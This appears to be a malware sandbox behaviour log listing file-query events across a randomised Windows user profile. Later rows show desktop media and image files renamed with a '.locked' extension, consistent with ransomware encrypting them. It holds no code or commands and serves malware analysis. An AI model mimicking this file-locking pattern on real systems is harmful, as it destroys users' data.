1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4 | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\FJiVEcJ3-.m4a | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\H32NiYV8GM2XI4LYYXl.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\hHSjXv8a6Z_2.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\I6TJNSCKQgEmU5xjaM.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\rK TLM.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\-x9fdI4TlY6.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\02iC79fEzno-o.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\5s_lg.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\5VuRCv.ods | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4 | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\cDcs.m4a | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3 | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\hj3W5.m4a | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\N2Z_sg2TQolsnap z1.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\NdlS1hsa5DHXHrE8.ots | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\pTkf3fUjfa0oFBs0.m4a | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\q-_bdeNCbT8.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4 | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qL3ZC74objCV.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\rQSE4Qal5DJag4QXCzO2.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\RYLbZpq0AmrZdjbN.flv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\SEO.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\snmPTBGFy7E5H.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\SNZFepCgNxp251k.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\tbUKkH9n.m4a | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\V8W9umfu6_zSR58j.flv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents | type = file_attributes |
|
22 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\eIgYE | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\eIgYE\bm0h gtpmiE N.ots | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\eIgYE\tcK03ycpYLXpdM.ods | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\eIgYE\WFDrV6nF6R-p8.odp | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\My Shapes | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\My Shapes\Favorites.vssx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\My Notebook | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OneNote Notebooks\My Notebook\Quick Notes.one | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\Outlook Files\lcfkj@kiekc.df.pst | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG | type = file_attributes |
|
10 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA | type = file_attributes |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\4G2YiDJA-3QS.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\FQMGhcqawSx.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\R17oDkklFjj3 Fg.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\w9bitm.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\CBgbi_9BVTAUNdP.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\DhirZEsW.pps | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\E1cNw5OF.ods | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\IfObQmf4-LwwZt.pps | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1uZmVK.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\2OC2a3cxmQAlU4.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\Akk9rv6AKt8FeF7N0T.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\cqxL.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\D5idNqhskaV1F.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\Database1.accdb | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\dfviBP XJeMW.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\DLaj8 rg_O8R0v.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\drYhpZsiNs398.csv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\eo6l yFEhu-A10EuMsj.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\FNDvaTe-NIFQ Z_mX6_Q.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\j1Lcudt2Kc.pps | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\jW6g.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\k604WhiZ_U.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\lVIGhYAwsO.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\mO3PdVum-vdCQupDVES.csv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OuKh.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\Poqg8b-cMcCmLtq.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\SQNZPM_jtkuCABGJIzK.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\UB6djaHHA84Hbb.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\VewNANYG2un.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\zrnbbjy 6cJy.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\ZWZb5bdUUfs6.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Downloads | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Downloads\ChromeSetup.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Downloads\jre-8u131-windows-x64.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Favorites | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Favorites\Links | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Favorites\Bing.url | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Links | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Links\Desktop.lnk | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Links\Downloads.lnk | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Links\OneDrive.lnk | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music | type = file_attributes |
|
42 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK | type = file_attributes |
|
35 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\n3xt_UCSwo_ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj | type = file_attributes |
|
32 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc | type = file_attributes |
|
23 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\4slC.gif | type = file_attributes |
|
5 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\S-V0K7xKBR3hd1x.png | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\Saved Pictures | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Saved Games | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Searches | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\mfD-NmMRr6-.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\KNvbSBBSeDT8snrXjA.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\cBLR.mp4 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT | type = file_attributes |
|
11 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4 | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\UelCoZd.mkv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\zxKel9v7IY.flv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\bOunbBUFbvQg3h6.mp4 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\C0FoKkB.swf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi | type = file_attributes |
|
7 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi | type = file_attributes |
|
7 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_attributes |
|
4 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_type |
|
4 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png.locked | type = file_type |
|
2 | |
